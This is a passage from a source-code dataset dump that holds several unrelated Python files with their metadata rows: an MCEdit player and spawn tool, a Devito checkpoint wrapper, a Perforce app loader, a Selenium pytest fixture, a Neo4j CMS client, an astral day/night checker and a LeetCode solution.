#result = ask("This pulls skins from the online server, so this may take a while", ["Ok", "Cancel"])
#if result == "Ok":
try:
for player in self.editor.level.players:
if player != "Player" and player in self.playerTexture.keys():
del self.playerTexture[player]
# print 6
r = self.playercache.getPlayerSkin(player, force_download=True, instance=self)
if isinstance(r, (str, unicode)):
r = r.join()
self.playerTexture[player] = loadPNGTexture(r)
#self.markerList.call(self._drawToolMarkers)
except:
raise Exception("Could not connect to the skins server, please check your Internet connection and try again.")
def gotoPlayerCamera(self):
player = self.panel.selectedPlayer
if player == "Player (Single Player)":
player = "Player"
try:
pos = self.editor.level.getPlayerPosition(player)
y, p = self.editor.level.getPlayerOrientation(player)
self.editor.gotoDimension(self.editor.level.getPlayerDimension(player))
self.editor.mainViewport.cameraPosition = pos
self.editor.mainViewport.yaw = y
self.editor.mainViewport.pitch = p
self.editor.mainViewport.stopMoving()
self.editor.mainViewport.invalidate()
except pymclevel.PlayerNotFound:
pass
def gotoPlayer(self):
player = self.panel.selectedPlayer
if player == "Player (Single Player)":
player = "Player"
try:
if self.editor.mainViewport.pitch < 0:
self.editor.mainViewport.pitch = -self.editor.mainViewport.pitch
self.editor.mainViewport.cameraVector = self.editor.mainViewport._cameraVector()
cv = self.editor.mainViewport.cameraVector
pos = self.editor.level.getPlayerPosition(player)
pos = map(lambda p, c: p - c * 5, pos, cv)
self.editor.gotoDimension(self.editor.level.getPlayerDimension(player))
self.editor.mainViewport.cameraPosition = pos
self.editor.mainViewport.stopMoving()
except pymclevel.PlayerNotFound:
pass
def __init__(self, *args):
EditorTool.__init__(self, *args)
self.reloadTextures()
self.nonSavedPlayers = []
textureVerticesHead = numpy.array(
(
# Backside of Head
24, 16, # Bottom Left
24, 8, # Top Left
32, 8, # Top Right
32, 16, # Bottom Right
# Front of Head
8, 16,
8, 8,
16, 8,
16, 16,
#
24, 0,
16, 0,
16, 8,
24, 8,
#
16, 0,
8, 0,
8, 8,
16, 8,
#
8, 8,
0, 8,
0, 16,
8, 16,
16, 16,
24, 16,
24, 8,
16, 8,
), dtype='f4')
textureVerticesHat = numpy.array(
(
56, 16,
56, 8,
64, 8,
64, 16,
48, 16,
48, 8,
40, 8,
40, 16,
56, 0,
48, 0,
48, 8,
56, 8,
48, 0,
40, 0,
40, 8,
48, 8,
40, 8,
32, 8,
32, 16,
40, 16,
48, 16,
56, 16,
56, 8,
48, 8,
), dtype='f4')
textureVerticesHead.shape = (24, 2)
textureVerticesHat.shape = (24, 2)
textureVerticesHead *= 4
textureVerticesHead[:, 1] *= 2
textureVerticesHat *= 4
textureVerticesHat[:, 1] *= 2
self.texVerts = (textureVerticesHead, textureVerticesHat)
self.playerPos = {0:{}, -1:{}, 1:{}}
self.playerTexture = {}
self.revPlayerPos = {0:{}, -1:{}, 1:{}}
self.inOtherDimension = {0: [], 1: [], -1: []}
self.playercache = PlayerCache()
self.markerList = DisplayList()
panel = None
def showPanel(self):
if not self.panel:
self.panel = PlayerPositionPanel(self)
self.panel.centery = (self.editor.mainViewport.height - self.editor.toolbar.height) / 2 + self.editor.subwidgets[0].height
self.panel.left = self.editor.left
self.editor.add(self.panel)
def hidePanel(self):
if self.panel and self.panel.parent:
self.panel.parent.remove(self.panel)
self.panel = None
def drawToolReticle(self):
if self.movingPlayer is None:
return
pos, direction = self.editor.blockFaceUnderCursor
dim = self.editor.level.getPlayerDimension(self.movingPlayer)
pos = (pos[0], pos[1] + 2, pos[2])
x, y, z = pos
# x,y,z=map(lambda p,d: p+d, pos, direction)
GL.glEnable(GL.GL_BLEND)
GL.glColor(1.0, 1.0, 1.0, 0.5)
self.drawCharacterHead(x + 0.5, y + 0.75, z + 0.5, self.revPlayerPos[dim][self.movingPlayer], dim)
GL.glDisable(GL.GL_BLEND)
GL.glEnable(GL.GL_DEPTH_TEST)
self.drawCharacterHead(x + 0.5, y + 0.75, z + 0.5, self.revPlayerPos[dim][self.movingPlayer], dim)
drawTerrainCuttingWire(BoundingBox((x, y, z), (1, 1, 1)))
drawTerrainCuttingWire(BoundingBox((x, y - 1, z), (1, 1, 1)))
#drawTerrainCuttingWire( BoundingBox((x,y-2,z), (1,1,1)) )
GL.glDisable(GL.GL_DEPTH_TEST)
markerLevel = None
def drawToolMarkers(self):
if not config.settings.drawPlayerHeads.get():
return
if self.markerLevel != self.editor.level:
self.markerList.invalidate()
self.markerLevel = self.editor.level
self.markerList.call(self._drawToolMarkers)
def _drawToolMarkers(self):
GL.glColor(1.0, 1.0, 1.0, 0.5)
GL.glEnable(GL.GL_DEPTH_TEST)
GL.glMatrixMode(GL.GL_MODELVIEW)
for player in self.editor.level.players:
try:
pos = self.editor.level.getPlayerPosition(player)
yaw, pitch = self.editor.level.getPlayerOrientation(player)
dim = self.editor.level.getPlayerDimension(player)
self.inOtherDimension[dim].append(player)
self.playerPos[dim][pos] = player
self.revPlayerPos[dim][player] = pos
if player != "Player" and config.settings.downloadPlayerSkins.get():
# print 7
r = self.playercache.getPlayerSkin(player, force_download=False)
if not isinstance(r, (str, unicode)):
r = r.join()
self.playerTexture[player] = loadPNGTexture(r)
else:
self.playerTexture[player] = self.charTex
if dim != self.editor.level.dimNo:
continue
x, y, z = pos
GL.glPushMatrix()
GL.glTranslate(x, y, z)
GL.glRotate(-yaw, 0, 1, 0)
GL.glRotate(pitch, 1, 0, 0)
GL.glColor(1, 1, 1, 1)
self.drawCharacterHead(0, 0, 0, (x,y,z), self.editor.level.dimNo)
GL.glPopMatrix()
# GL.glEnable(GL.GL_BLEND)
drawTerrainCuttingWire(FloatBox((x - .5, y - .5, z - .5), (1, 1, 1)),
c0=(0.3, 0.9, 0.7, 1.0),
c1=(0, 0, 0, 0),
)
#GL.glDisable(GL.GL_BLEND)
except Exception, e:
print "Exception in editortools.player.PlayerPositionTool._drawToolMarkers:", repr(e)
import traceback
print traceback.format_exc()
continue
GL.glDisable(GL.GL_DEPTH_TEST)
def drawCharacterHead(self, x, y, z, realCoords=None, dim=0):
GL.glEnable(GL.GL_CULL_FACE)
origin = (x - 0.25, y - 0.25, z - 0.25)
size = (0.5, 0.5, 0.5)
box = FloatBox(origin, size)
hat_origin = (x - 0.275, y - 0.275, z - 0.275)
hat_size = (0.55, 0.55, 0.55)
hat_box = FloatBox(hat_origin, hat_size)
if realCoords is not None and self.playerPos[dim][realCoords] != "Player" and config.settings.downloadPlayerSkins.get():
drawCube(box,
texture=self.playerTexture[self.playerPos[dim][realCoords]], textureVertices=self.texVerts[0])
GL.glEnable(GL.GL_BLEND)
GL.glBlendFunc(GL.GL_SRC_ALPHA, GL.GL_ONE_MINUS_SRC_ALPHA)
drawCube(hat_box,
texture=self.playerTexture[self.playerPos[dim][realCoords]], textureVertices=self.texVerts[1])
GL.glDisable(GL.GL_BLEND)
else:
drawCube(box,
texture=self.charTex, textureVertices=self.texVerts[0])
GL.glDisable(GL.GL_CULL_FACE)
#@property
#def statusText(self):
# if not self.panel:
# return ""
# player = self.panel.selectedPlayer
# if player == "Player":
# return "Click to move the player"
#
# return _("Click to move the player \"{0}\"").format(player)
@alertException
def mouseDown(self, evt, pos, direction):
if self.movingPlayer is None:
return
pos = (pos[0] + 0.5, pos[1] + 2.75, pos[2] + 0.5)
op = PlayerMoveOperation(self, pos, self.movingPlayer)
self.movingPlayer = None
if self.recordMove:
self.editor.addOperation(op)
addingMoving = False
else:
self.editor.performWithRetry(op) #Prevent recording of Undo when adding player
self.recordMove = True
addingMoving = True
if op.canUndo and not addingMoving:
self.editor.addUnsavedEdit()
def keyDown(self, evt):
keyname = evt.dict.get('keyname', None) or self.editor.get_root().getKey(evt)
if not self.recordMove:
if not pygame.key.get_focused():
return
if keyname == "Escape":
self.recordMove = True
if self.panel and self.panel.__class__ == PlayerPositionPanel:
self.panel.key_down(evt)
def keyUp(self, evt):
pass
def levelChanged(self):
self.markerList.invalidate()
@alertException
def toolSelected(self):
self.showPanel()
self.movingPlayer = None
@alertException
def toolReselected(self):
if self.panel:
self.gotoPlayer()
class PlayerSpawnPositionOptions(ToolOptions):
def __init__(self, tool):
ToolOptions.__init__(self, name='Panel.PlayerSpawnPositionOptions')
self.tool = tool
self.spawnProtectionCheckBox = CheckBox(ref=AttrRef(tool, "spawnProtection"))
self.spawnProtectionLabel = Label("Spawn Position Safety")
self.spawnProtectionLabel.mouse_down = self.spawnProtectionCheckBox.mouse_down
tooltipText = "Minecraft will randomly move your spawn point if you try to respawn in a column where there are no blocks at Y=63 and Y=64. Only uncheck this box if Minecraft is changed."
self.spawnProtectionLabel.tooltipText = self.spawnProtectionCheckBox.tooltipText = tooltipText
row = Row((self.spawnProtectionCheckBox, self.spawnProtectionLabel))
col = Column((Label("Spawn Point Options"), row, Button("OK", action=self.dismiss)))
self.add(col)
self.shrink_wrap()
class PlayerSpawnPositionTool(PlayerPositionTool):
surfaceBuild = True
toolIconName = "playerspawn"
tooltipText = "Move Spawn Point\nRight-click for options"
def __init__(self, *args):
PlayerPositionTool.__init__(self, *args)
self.optionsPanel = PlayerSpawnPositionOptions(self)
def toolEnabled(self):
return self.editor.level.dimNo == 0
def showPanel(self):
self.panel = Panel(name='Panel.PlayerSpawnPositionTool')
button = Button("Goto Spawn", action=self.gotoSpawn)
self.panel.add(button)
self.panel.shrink_wrap()
self.panel.left = self.editor.left
self.panel.centery = self.editor.centery
self.editor.add(self.panel)
def gotoSpawn(self):
cv = self.editor.mainViewport.cameraVector
pos = self.editor.level.playerSpawnPosition()
pos = map(lambda p, c: p - c * 5, pos, cv)
self.editor.mainViewport.cameraPosition = pos
self.editor.mainViewport.stopMoving()
@property
def statusText(self):
return "Click to set the spawn position."
spawnProtection = config.spawn.spawnProtection.property()
def drawToolReticle(self):
pos, direction = self.editor.blockFaceUnderCursor
x, y, z = map(lambda p, d: p + d, pos, direction)
color = (1.0, 1.0, 1.0, 0.5)
if isinstance(self.editor.level, pymclevel.MCInfdevOldLevel) and self.spawnProtection:
if not positionValid(self.editor.level, (x, y, z)):
color = (1.0, 0.0, 0.0, 0.5)
GL.glColor(*color)
GL.glEnable(GL.GL_BLEND)
self.drawCage(x, y, z)
self.drawCharacterHead(x + 0.5, y + 0.5, z + 0.5)
GL.glDisable(GL.GL_BLEND)
GL.glEnable(GL.GL_DEPTH_TEST)
self.drawCage(x, y, z)
self.drawCharacterHead(x + 0.5, y + 0.5, z + 0.5)
color2 = map(lambda a: a * 0.4, color)
drawTerrainCuttingWire(BoundingBox((x, y, z), (1, 1, 1)), color2, color)
GL.glDisable(GL.GL_DEPTH_TEST)
def _drawToolMarkers(self):
x, y, z = self.editor.level.playerSpawnPosition()
GL.glBlendFunc(GL.GL_SRC_ALPHA, GL.GL_ONE_MINUS_SRC_ALPHA)
GL.glEnable(GL.GL_BLEND)
color = config.selectionColors.black.get() + (0.35,)
GL.glColor(*color)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_LINE)
GL.glLineWidth(2.0)
drawCube(FloatBox((x, y, z), (1, 1, 1)))
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
drawCube(FloatBox((x, y, z), (1, 1, 1)))
GL.glDisable(GL.GL_BLEND)
GL.glEnable(GL.GL_DEPTH_TEST)
GL.glColor(1.0, 1.0, 1.0, 1.0)
self.drawCage(x, y, z)
self.drawCharacterHead(x + 0.5, y + 0.5 + 0.125 * numpy.sin(self.editor.frames * 0.05), z + 0.5)
GL.glDisable(GL.GL_DEPTH_TEST)
def drawCage(self, x, y, z):
cageTexVerts = numpy.array(pymclevel.MCInfdevOldLevel.materials.blockTextures[52, 0])
pixelScale = 0.5 if self.editor.level.materials.name in ("Pocket", "Alpha") else 1.0
texSize = 16 * pixelScale
cageTexVerts = cageTexVerts.astype(float) * pixelScale
cageTexVerts = numpy.array(
[((tx, ty), (tx + texSize, ty), (tx + texSize, ty + texSize), (tx, ty + texSize)) for (tx, ty) in
cageTexVerts], dtype='float32')
GL.glEnable(GL.GL_ALPHA_TEST)
drawCube(BoundingBox((x, y, z), (1, 1, 1)), texture=pymclevel.alphaMaterials.terrainTexture,
textureVertices=cageTexVerts)
GL.glDisable(GL.GL_ALPHA_TEST)
@alertException
def mouseDown(self, evt, pos, direction):
pos = map(lambda p, d: p + d, pos, direction)
op = PlayerSpawnMoveOperation(self, pos)
try:
self.editor.addOperation(op)
if op.canUndo:
self.editor.addUnsavedEdit()
self.markerList.invalidate()
except SpawnPositionInvalid, e:
if "Okay" != ask(str(e), responses=["Okay", "Fix it for me!"]):
level = self.editor.level
status = ""
if not okayAt63(level, pos):
level.setBlockAt(pos[0], 63, pos[2], 1)
status += _("Block added at y=63.\n")
if 59 < pos[1] < 63:
pos[1] = 63
status += _("Spawn point moved upward to y=63.\n")
if not okayAboveSpawn(level, pos):
if pos[1] > 63 or pos[1] < 59:
lpos = (pos[0], pos[1] - 1, pos[2])
if level.blockAt(*pos) == 0 and level.blockAt(*lpos) != 0 and okayAboveSpawn(level, lpos):
pos = lpos
status += _("Spawn point shifted down by one block.\n")
if not okayAboveSpawn(level, pos):
for i in xrange(1, 4):
level.setBlockAt(pos[0], pos[1] + i, pos[2], 0)
status += _("Blocks above spawn point cleared.\n")
self.editor.invalidateChunks([(pos[0] // 16, pos[2] // 16)])
op = PlayerSpawnMoveOperation(self, pos)
try:
self.editor.addOperation(op)
if op.canUndo:
self.editor.addUnsavedEdit()
self.markerList.invalidate()
except SpawnPositionInvalid, e:
alert(str(e))
return
if len(status):
alert(_("Spawn point fixed. Changes: \n\n") + status)
@alertException
def toolReselected(self):
self.gotoSpawn()
| 39.632214 | 219 | 0.578836 | 5,187 | 46,013 | 5.07326 | 0.125506 | 0.033441 | 0.015314 | 0.009576 | 0.455748 | 0.364279 | 0.312673 | 0.257458 | 0.235265 | 0.188448 | 0 | 0.018998 | 0.309043 | 46,013 | 1,160 | 220 | 39.666379 | 0.8087 | 0.0469 | 0 | 0.413636 | 0 | 0.002273 | 0.068162 | 0.004797 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.004545 | 0.023864 | null | null | 0.003409 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
914cca42f7c78c12fb45153e185381ce97dc5240 | 5,200 | py | Python | seismic/checkpointing/checkpoint.py | slimgroup/Devito-Examples | 449e1286a18ebc4172069372ba2bf3cd2ec99a2f | [
"MIT"
] | 7 | 2020-08-19T18:23:08.000Z | 2022-02-18T19:19:24.000Z | seismic/checkpointing/checkpoint.py | slimgroup/Devito-Examples | 449e1286a18ebc4172069372ba2bf3cd2ec99a2f | [
"MIT"
] | null | null | null | seismic/checkpointing/checkpoint.py | slimgroup/Devito-Examples | 449e1286a18ebc4172069372ba2bf3cd2ec99a2f | [
"MIT"
] | 3 | 2020-12-01T22:17:09.000Z | 2021-05-21T11:29:07.000Z | # The MIT License (MIT)
#
# Copyright (c) 2016, Imperial College, London
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in the
# Software without restriction, including without limitation the rights to use, copy,
# modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so, subject to the
# following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
# FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from pyrevolve import Checkpoint, Operator
from devito import TimeFunction
from devito.tools import flatten
class CheckpointOperator(Operator):
"""Devito's concrete implementation of the ABC pyrevolve.Operator. This class wraps
devito.Operator so it conforms to the pyRevolve API. pyRevolve will call apply
with arguments t_start and t_end. Devito calls these arguments t_s and t_e so
the following dict is used to perform the translations between different names.
Parameters
----------
op : Operator
devito.Operator object that this object will wrap.
args : dict
If devito.Operator.apply() expects any arguments, they can be provided
here to be cached. Any calls to CheckpointOperator.apply() will
automatically include these cached arguments in the call to the
underlying devito.Operator.apply().
"""
t_arg_names = {'t_start': 'time_m', 't_end': 'time_M'}
def __init__(self, op, **kwargs):
self.op = op
self.args = kwargs
op_default_args = self.op._prepare_arguments(**kwargs)
self.start_offset = op_default_args[self.t_arg_names['t_start']]
def _prepare_args(self, t_start, t_end):
args = self.args.copy()
args[self.t_arg_names['t_start']] = t_start + self.start_offset
args[self.t_arg_names['t_end']] = t_end - 1 + self.start_offset
return args
def apply(self, t_start, t_end):
""" If the devito operator requires some extra arguments in the call to apply
they can be stored in the args property of this object so pyRevolve calls
pyRevolve.Operator.apply() without caring about these extra arguments while
this method passes them on correctly to devito.Operator
"""
# Build the arguments list to invoke the kernel function
args = self.op.arguments(**self._prepare_args(t_start, t_end))
# Invoke kernel function with args
arg_values = [args[p.name] for p in self.op.parameters]
self.op.cfunction(*arg_values)
class DevitoCheckpoint(Checkpoint):
"""Devito's concrete implementation of the Checkpoint abstract base class provided by
pyRevolve. Holds a list of symbol objects that hold data.
"""
def __init__(self, objects):
"""Intialise a checkpoint object. Upon initialisation, a checkpoint
stores only a reference to the objects that are passed into it."""
assert(all(isinstance(o, TimeFunction) for o in objects))
dtypes = set([o.dtype for o in objects])
assert(len(dtypes) == 1)
self._dtype = dtypes.pop()
self.objects = objects
@property
def dtype(self):
return self._dtype
def get_data(self, timestep):
data = flatten([get_symbol_data(s, timestep) for s in self.objects])
return data
def get_data_location(self, timestep):
return self.get_data(timestep)
@property
def size(self):
"""The memory consumption of the data contained in a checkpoint."""
return sum([int((o.size_allocated/(o.time_order+1))*o.time_order)
for o in self.objects])
def save(*args):
raise RuntimeError("Invalid method called. Did you check your version" +
" of pyrevolve?")
def load(*args):
raise RuntimeError("Invalid method called. Did you check your version" +
" of pyrevolve?")
def get_symbol_data(symbol, timestep):
timestep += symbol.time_order - 1
ptrs = []
for i in range(symbol.time_order):
# Use `._data`, instead of `.data`, as `.data` is a view of the DOMAIN
# data region which is non-contiguous in memory. The performance hit from
# dealing with non-contiguous memory is so big (introduces >1 copy), it's
# better to checkpoint unneccesarry stuff to get a contiguous chunk of memory.
ptr = symbol._data[timestep - i, :, :]
ptrs.append(ptr)
return ptrs
| 44.067797 | 129 | 0.68 | 722 | 5,200 | 4.804709 | 0.347645 | 0.025368 | 0.010378 | 0.011531 | 0.105794 | 0.081868 | 0.057077 | 0.043817 | 0.043817 | 0.043817 | 0 | 0.002288 | 0.243462 | 5,200 | 117 | 130 | 44.444444 | 0.879512 | 0.533269 | 0 | 0.117647 | 0 | 0 | 0.076023 | 0 | 0 | 0 | 0 | 0 | 0.039216 | 1 | 0.215686 | false | 0 | 0.058824 | 0.039216 | 0.45098 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
914dad243b4f6fd43e52b214d9db3b5771ad2444 | 623 | py | Python | Perforce/AppUtils.py | TomMinor/MayaPerforce | 52182c7e5c3e91e41973d0c2abbda8880e809e49 | [
"MIT"
] | 13 | 2017-03-31T21:52:19.000Z | 2021-09-06T23:15:30.000Z | Perforce/AppUtils.py | TomMinor/MayaPerforce | 52182c7e5c3e91e41973d0c2abbda8880e809e49 | [
"MIT"
] | 3 | 2017-05-08T02:27:43.000Z | 2017-05-10T03:20:11.000Z | Perforce/AppUtils.py | TomMinor/MayaPerforce | 52182c7e5c3e91e41973d0c2abbda8880e809e49 | [
"MIT"
] | 3 | 2017-05-05T14:03:03.000Z | 2020-05-25T10:25:04.000Z | import os
import sys
import re
import logging
p4_logger = logging.getLogger("Perforce")
# Import app specific utilities, maya opens scenes differently than nuke etc
# Are we in maya or nuke?
if re.match( "maya", os.path.basename( sys.executable ), re.I ):
p4_logger.info("Configuring for Maya")
from MayaUtils import *
elif re.match( "nuke", os.path.basename( sys.executable ), re.I ):
p4_logger.info("Configuring for Nuke")
from NukeUtils import *
else:
p4_logger.warning("Couldn't find app configuration")
raise ImportError("No supported applications found that this plugin can interface with")
| 32.789474 | 90 | 0.738363 | 91 | 623 | 5.010989 | 0.593407 | 0.070175 | 0.061404 | 0.074561 | 0.245614 | 0.245614 | 0.245614 | 0.245614 | 0.245614 | 0.245614 | 0 | 0.007678 | 0.163724 | 623 | 18 | 91 | 34.611111 | 0.867562 | 0.157303 | 0 | 0 | 0 | 0 | 0.305556 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
e66dd75ae0bf7e3d43a0a0b5833ef2c98e86a332 | 581 | py | Python | tests/conftest.py | artembashlak/share-youtube-to-mail | 347f72ed8846b85cae8e4f39896ab54e698a6de9 | [
"Apache-2.0"
] | null | null | null | tests/conftest.py | artembashlak/share-youtube-to-mail | 347f72ed8846b85cae8e4f39896ab54e698a6de9 | [
"Apache-2.0"
] | null | null | null | tests/conftest.py | artembashlak/share-youtube-to-mail | 347f72ed8846b85cae8e4f39896ab54e698a6de9 | [
"Apache-2.0"
] | null | null | null | import pytest
from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
@pytest.fixture(scope="function")
def browser():
options = webdriver.ChromeOptions()
options.add_argument('ignore-certificate-errors')
options.add_argument("--headless")
options.add_argument('--no-sandbox')
options.add_argument('start-maximized')
options.add_argument('disable-infobars')
options.add_argument("--disable-extensions")
driver = webdriver.Chrome(ChromeDriverManager().install(), options=options)
yield driver
driver.quit()
| 30.578947 | 79 | 0.753873 | 62 | 581 | 6.951613 | 0.516129 | 0.139211 | 0.25058 | 0.116009 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.123924 | 581 | 18 | 80 | 32.277778 | 0.846758 | 0 | 0 | 0 | 0 | 0 | 0.182444 | 0.043029 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.2 | 0 | 0.266667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e66e53547faa705c9a68f28dba07b4048f2f1b31 | 2,335 | py | Python | crusoe_observe/neo4j-client/neo4jclient/CMSClient.py | CSIRT-MU/CRUSOE | 73e4ac0ced6c3ac46d24ac5c3feb01a1e88bd36b | [
"MIT"
] | 3 | 2021-11-09T09:55:17.000Z | 2022-02-19T02:58:27.000Z | crusoe_observe/neo4j-client/neo4jclient/CMSClient.py | CSIRT-MU/CRUSOE | 73e4ac0ced6c3ac46d24ac5c3feb01a1e88bd36b | [
"MIT"
] | null | null | null | crusoe_observe/neo4j-client/neo4jclient/CMSClient.py | CSIRT-MU/CRUSOE | 73e4ac0ced6c3ac46d24ac5c3feb01a1e88bd36b | [
"MIT"
] | null | null | null | from neo4jclient.AbsClient import AbstractClient
class CMSClient(AbstractClient):
def __init__(self, password, **kwargs):
super().__init__(password=password, **kwargs)
def get_domain_names(self):
"""
Gets all domain names from database.
:return: domain names in JSON-like form
"""
return self._run_query("MATCH(n:DomainName) RETURN n.domain_name AS domains")
def get_ips_and_domain_names(self):
"""
Gets all domain names with corresponding IPs from database.
:return: IPs and DomainNames in JSON-like form
"""
return self._run_query("MATCH(n:IP)-[:RESOLVES_TO]-(y:DomainName {tag: \'A/AAAA\'}) "
"RETURN { IP: n.address , Domain: y.domain_name } AS entry")
def create_cms_component(self, path):
"""
Create nodes and relationships for cms client.
-------------
Antivirus_query:
1. Parse csv given in path.
2. Create node of type [:SoftwareVersion, :IP] if not already exists.
3. Create node of type [:Host], relationship of type [:ON] with parameters [start,end] if not already exists.
Otherwise just update information about time on parameters [start,end].
4. Create node of type [:Node], relationship of type [:HAS_ASSIGNED].
5. Create relationship of type [:IS_A] between :Host and :Node if not already exists.
:param path: Path to the JSON with values
:return:
"""
path = f'file:///{path}'
query = "CALL apoc.load.json($path) " \
"YIELD value " \
"UNWIND value.data AS data " \
"UNWIND data.cpe as cpe " \
"WITH data.ip as ip_ad, cpe, value.time as theTime " \
"MERGE (ipadd:IP {address: ip_ad}) " \
"MERGE (softVersion:SoftwareVersion {version: cpe, tag: \'cms_client\'}) " \
"MERGE (ipadd)<-[:HAS_ASSIGNED]-(nod:Node) " \
"MERGE (nod)-[:IS_A]->(host:Host) " \
"MERGE (softVersion)-[r:ON]->(host) " \
"ON CREATE SET r.start = datetime(theTime),r.end = datetime(theTime) " \
"ON MATCH SET r.end = datetime(theTime)"
params = {'path': path}
self._run_query(query, **params)
| 39.576271 | 117 | 0.576017 | 282 | 2,335 | 4.652482 | 0.393617 | 0.027439 | 0.027439 | 0.036585 | 0.108232 | 0.108232 | 0.108232 | 0.057927 | 0.057927 | 0.057927 | 0 | 0.003672 | 0.300214 | 2,335 | 58 | 118 | 40.258621 | 0.799266 | 0.321627 | 0 | 0 | 0 | 0 | 0.455571 | 0.141749 | 0 | 0 | 0 | 0 | 0 | 1 | 0.16 | false | 0.08 | 0.04 | 0 | 0.32 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
e66ec2107d63dfd849c5ad20ff3a6280caaa39d1 | 604 | py | Python | location.py | jonasjucker/wildlife-telegram | 5fb548d3779782467247cf5d1e165d1c2349de30 | [
"MIT"
] | null | null | null | location.py | jonasjucker/wildlife-telegram | 5fb548d3779782467247cf5d1e165d1c2349de30 | [
"MIT"
] | null | null | null | location.py | jonasjucker/wildlife-telegram | 5fb548d3779782467247cf5d1e165d1c2349de30 | [
"MIT"
] | null | null | null | import time
from datetime import date,datetime
from astral import LocationInfo
from astral.sun import sun
class CamLocation:
def __init__(self,lat,lon,info,country,timezone):
self.info = LocationInfo(info, country, timezone, lat, lon)
def is_night(self):
s = sun(self.info.observer, date=date.today(),tzinfo=self.info.timezone)
sunrise = s["sunrise"].timestamp()
sunset = s["sunset"].timestamp()
time_now = datetime.now().timestamp()
if time_now > sunrise and time_now < sunset:
return False
else:
return True
| 27.454545 | 80 | 0.652318 | 76 | 604 | 5.078947 | 0.447368 | 0.062176 | 0.098446 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.243377 | 604 | 21 | 81 | 28.761905 | 0.844639 | 0 | 0 | 0 | 0 | 0 | 0.021523 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.25 | 0 | 0.5625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
e671c98e986dfbf41b15884e3c4cc078b893ecb2 | 1,040 | py | Python | Python/problem1150.py | 1050669722/LeetCode-Answers | c8f4d1ccaac09cda63b60d75144335347b06dc81 | [
"MIT"
] | null | null | null | Python/problem1150.py | 1050669722/LeetCode-Answers | c8f4d1ccaac09cda63b60d75144335347b06dc81 | [
"MIT"
] | null | null | null | Python/problem1150.py | 1050669722/LeetCode-Answers | c8f4d1ccaac09cda63b60d75144335347b06dc81 | [
"MIT"
] | null | null | null | from typing import List
from collections import Counter
# class Solution:
# def isMajorityElement(self, nums: List[int], target: int) -> bool:
# d = Counter(nums)
# return d[target] > len(nums)//2
# class Solution:
# def isMajorityElement(self, nums: List[int], target: int) -> bool:
# ans = 0
# for num in nums:
# if num == target:
# ans += 1
# return ans > len(target)//2
class Solution:
def isMajorityElement(self, nums: List[int], target: int) -> bool:
if not nums:
return False
if len(nums) == 1:
return nums[0] == target
p, q = 0, len(nums)-1
while p < q:
if nums[p] > target:
return False
elif nums[p] < target:
p += 1
if nums[q] < target:
return False
elif nums[q] > target:
q -= 1
if nums[p] == nums[q] == target:
return q - p + 1 > len(nums)//2
